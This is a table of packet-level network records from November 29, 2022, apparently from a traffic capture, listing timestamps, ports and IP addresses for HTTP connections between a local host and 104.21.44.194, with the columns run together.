                                                                          Nov 29, 2022 09:20:41.308999062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309009075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309020042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309031010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309041977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309051991 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309062958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309081078 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309092045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309092045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309092999 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309092045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309092045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309092045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309092045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309092045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309092045 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309103966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309118986 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309118986 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309118986 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309212923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309223890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309235096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309246063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309256077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309267044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309277058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309279919 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309288025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309298992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309309006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309319973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309329987 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309340954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.309429884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309429884 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.309477091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312362909 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312374115 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312385082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312396049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312406063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312417030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312427998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312438965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312448978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312459946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312500954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312511921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312522888 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312532902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312544107 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312553883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312565088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312575102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312586069 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312587023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312587023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312597036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312607050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312618017 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312628031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312638998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312649012 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312659979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312669992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312680960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312757969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312757969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312757969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312757969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312758923 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312772989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312783957 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312794924 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312805891 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312815905 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312827110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312838078 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312848091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312859058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312869072 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312880039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312891006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312901974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312911987 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312922955 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312933922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312933922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312933922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312933922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312933922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312937021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.312933922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312933922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.312947989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313002110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313014030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313024044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313035011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313045979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313056946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313067913 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313079119 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313093901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313093901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313093901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313093901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313093901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313093901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313093901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313093901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313112020 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313112020 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313112020 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313112020 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313112020 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313265085 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313265085 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313277006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313287973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313298941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313308954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313319921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313330889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313340902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313352108 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313363075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313374043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313385010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313395977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313406944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313417912 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313427925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313435078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313435078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313435078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313435078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313435078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313438892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313450098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313461065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313472033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313514948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313525915 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313536882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313548088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313558102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313569069 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313580036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313591003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313601017 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313611984 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313622952 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313633919 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313643932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313654900 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313658953 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313658953 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313666105 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313677073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313688040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313699007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313709021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313719988 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313731909 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313776970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313787937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313798904 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313810110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313821077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313826084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313826084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313826084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313826084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313826084 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313832045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313842058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313853025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313863993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313874960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313885927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313895941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313906908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313918114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313929081 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313939095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313950062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313961029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313971043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.313999891 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313999891 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313999891 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.313999891 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314011097 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314024925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314035892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314047098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314058065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314069033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314079046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314090014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314100981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314110994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314121962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314132929 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314142942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314153910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314165115 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314167023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314167023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314167023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314167023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314176083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314187050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314284086 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314295053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314306021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314316034 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314327002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314333916 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.314337969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314347982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314358950 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314368963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314379930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314390898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314400911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314412117 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314421892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314433098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314443111 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.314454079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317789078 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317799091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317810059 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317820072 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317831039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317840099 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317842007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317941904 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317953110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317964077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317974091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317985058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317996025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318003893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318003893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318003893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318003893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318003893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318003893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318006992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318003893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318003893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318017960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318027973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318028927 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318028927 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318028927 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318028927 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318038940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318049908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318061113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318070889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318083048 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318093061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318175077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318175077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318175077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318175077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318207026 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318217993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318228006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318238974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318249941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318259954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318270922 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318288088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318300962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318311930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318322897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318334103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318344116 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318346024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318346024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318346024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318346024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318346024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318355083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318366051 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318376064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318387032 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318397999 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318408012 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318435907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318447113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318458080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318468094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318479061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318490028 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318500996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318511963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318516970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318516970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318516970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318516970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318517923 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318517923 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318521976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318532944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318543911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318681002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318681002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318681002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318681002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318681002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.728874922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:42.201445103 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:42.210258007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.661503077 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.670319080 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.670452118 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.671021938 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.671114922 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.671147108 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.671185970 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.679902077 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.679913044 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.679996014 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.680005074 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.680012941 CET8049859104.21.44.194192.168.11.20
